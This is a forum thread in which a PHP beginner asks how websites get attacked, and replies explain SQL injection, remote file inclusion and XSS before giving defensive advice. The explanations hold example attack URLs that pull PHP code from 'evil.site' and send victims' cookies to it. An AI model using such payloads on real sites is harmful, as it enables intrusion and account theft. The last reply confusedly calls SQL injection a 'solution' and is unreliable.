I have been reading a lot about php security and how to stop people from breaking into my site and all that and i am having a hard time understanding the ways they can break in or just mess my site up.

Can someone tell me plainly the ways that people use to break into websites and how to stop it? I already know that they can use sql injections and input sql injection into my input or form fields and i should filter out all the inputs on my site but that is all that i basically know right now.

• SQL injection
• includes and requires not sanitized (i.e.
  
  PHP Code:

  include($_GET['page']); 

  then the attacker can make a request like /?page=http://evil.site/php.code, which then executes evil PHP code if remote connections are allowed. There are other methods exploiting this same principle.
• other unsafe PHP (unsafe again as in not sanitized for all expected values), reading (from configuration), writing to files (overwriting, DoS)
• XSS - if an attacker can inject content into your html site (if you let him), like, you have
  http://your.site/?warning='This is some stupid warning', and attacker writes http://your.site/?modifier=<script>send client cookie to evil.site</script>, and then sends this link to thousands of people who *have an account* at your website, he can then steal their session cookies ~ accounts. This is not a server attack, but very frequent these days. If you have a user base that logs into your site, this is definitely something to be considerate about.
• CSRF
• ...
• ?

[google]sql injection[/google]
[google]php code injection[/google]
[google]xss[/google]
[google]csrf[/google]

I have no idea what you just said i can not even really understand it.

And what is this supposed to mean below.

[google]sql injection[/google]
[google]php code injection[/google]
[google]xss[/google]
[google]csrf[/google]

If that is supposed to mean for me to look it up on google then i have already said in my first post that i have been reading a lot and i am having a hard time understanding it so you posting a bunch of garbage between fake google tags is not helping, because i can go look it up but it will still be hard for me to understand.

Those are keywords into more specific subjects of website, namely PHP, security.
When you study all those, if you have any definite questions, please ask.

The take home message is always always ALWAYS do the following...

1. Filter input e.g. Make sure you receive a value you are expecting -it could be a number, only letters, more then 30 characters, less than or equal to 2 or whatever etc.

2. Escape output e.g. use htmlentities() for anything going to the browser. This way if there's any dirty code (as a result of your site being hacked) this will deactivate it before it reaches the browser.

Strictly speaking if you filter input correctly then you won't need to escape output. But ALWAYS do both. It's good to read up on how each vulnerability works but if you live by these rules you won't go far wrong!

I accede to you freeloader that those are keywords into added specific capacity of website.
_________________
Adt security

In addition to filtering and escaping, you can also typecast inputs. If you're expecting a number as an input, you can use intval() for example.

Your most important tool is mysql_real_escape_string()

Hi,
I would agree with using the typecast inputs.I think this will help you.
Just try this.
Another solution is sql injection for which you have the basic information.
Thanks!!